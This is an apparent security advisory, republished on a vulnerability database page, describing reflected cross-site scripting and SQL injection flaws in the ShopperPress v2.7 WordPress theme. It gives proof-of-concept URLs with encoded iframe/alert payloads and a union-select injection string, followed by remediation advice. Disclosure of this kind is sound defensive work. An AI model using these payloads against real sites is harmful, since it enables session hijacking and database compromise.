Vulners
Lucene search
WordPress ShopperPress v2.7 Cross Site Scripting / SQL Injection
ShopperPress v2.7 Wordpress - Cross Site Vulnerabilities
Details:
========
Multiple non persistent cross site scripting vulnerabilities are detected in the Shopperpress Premium Wordpress Theme and Addon v2.7.
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter
action. The bugs are located on client side in the search and edit module with the bound vulnerable id, search or order parameters.
Successful exploitation can result in wordpress application account steal, client side phishing & client-side content request manipulation.
Exploitation requires medium or high user inter action & without privileged web application user account.
Vulnerable Module(s):
[+] Search
[+] Page&Edit
Vulnerable Parameter(s):
[+] search
[+] id
[+] order
Proof of Concept:
=================
The non persistent cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user inter action
and without privileged user account. For demonstration or reproduce ...
PoC:
http://shopperpress.127.0.0.1:38/wp-admin/admin.php
?page=images&p=0&search=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C
http://shopperpress.127.0.0.1:38/wp-admin/admin.php
?page=emails&edit=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C
http://shopperpress.127.0.0.1:38/wp-admin/admin.php
?page=members&edit&order=0%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C
Review: File Manager
<fieldset style="padding:0px;">
<h2 style="float:left; padding-left:5px;">"><[CLIENT SIDE MALICIOUS SCRIPT CODE])" width="800">
<form method="get" name="SearchForm" action="admin.php"
style="padding:5px; float:right;">
<input type="hidden" name="page" value="images" />
<input type="hidden" name="p" value="0" />
<input name="search" type="text" class="ppt-forminput"
id="search">
<input type="submit" style="font-size:16px; background:#efefef;
color:#666;padding:5px;" value="Search Files">
</form>
<div class="clearfix"></div>
<form class="plain" method="post" name="orderform" id="orderform">
<input type="hidden" name="deleteimages" value="1">
Review: Member Add/Edit Listing
<ul>
<li><a rel="premiumpress_tab1" href="#" class="active">Details</a></li>
<li><a href="#" onclick="window.location.href='admin.php
?page=orders&cid=5"><[CLIENT SIDE MALICIOUS SCRIPT CODE])"
width="800">Order History</a></li>
<!--<li><a href="admin.php?page=members">Search Results</a></li>-->
</ul>
</div>
<div id="videobox1"></div>
<form method="post" target="_self" enctype="multipart/form-data">
<input name="action" type="hidden" value="edit" />
<input name="userdata[ID]" type="hidden" value="5"><[CLIENT SIDE MALICIOUS SCRIPT CODE]") <" />
<input type="hidden" value="" name="showThisTab" id="showThisTab" />
<div id="premiumpress_tab1" class="content">
Review: EMail Add/Edit
<div id="premiumpress_tab1" class="content">
<form class="fields" method="post" target="_self" enctype="multipart/form-data">
<input name="action" value="edit" type="hidden">
<input name="ID" value=""
type="hidden"><[CLIENT SIDE MALICIOUS SCRIPT CODE];)" width="800">
<input type="hidden" name="form[email_type]" value="email" />
<fieldset>
<div class="titleh"><h3>Email Options</h3></div>
Solution:
=========
The vulnerability can be patched by parsing the orders, id & search web application parameters.
Risk:
=====
The security risk of the non persistent cross site scripting vulnerabilities are estimated as medium(-).
Details:
========
A SQL Injection vulnerability is detected in the Shopperpress official Premium Wordpress Theme and Addon v2.7.
Remote attackers with privileged user accounts & module access can execute/inject own sql commands to compromise
the wordpress application dbms. The vulnerability is located in the listing modules with the bound vulnerable
id parameter. Exploitation requires privileged user account or module access rights.
Vulnerable Module(s):
[+] Listing - [Edit]
Vulnerable Parameter(s):
[+] ID
Proof of Concept:
=================
The sql injection vulnerability can be exploited by a privileged wordpress user account without user inter action. For demonstration or reproduce ...
PoC:
http://shopperpress.127.0.0.1:38/wp-admin/admin.php?page=orders&id=5-261343282-1%27union select[SQL-INJECTION!]--
--- SQL Exception Logs ---
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right
syntax to use near '[SQL-INJECTION!]' GROUP BY order_id LIMIT 1' at line 1 on line: 80
Solution:
=========
The vulnerability can be patched by parsing the id parameter of the edit functions in the addon module files.
Risk:
=====
The security risk of the sql injection vulnerability is estimated as high(-).
# 0day.today [2018-04-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Aug 2012 00:00Current
7.1High risk
Vulners AI Score7.1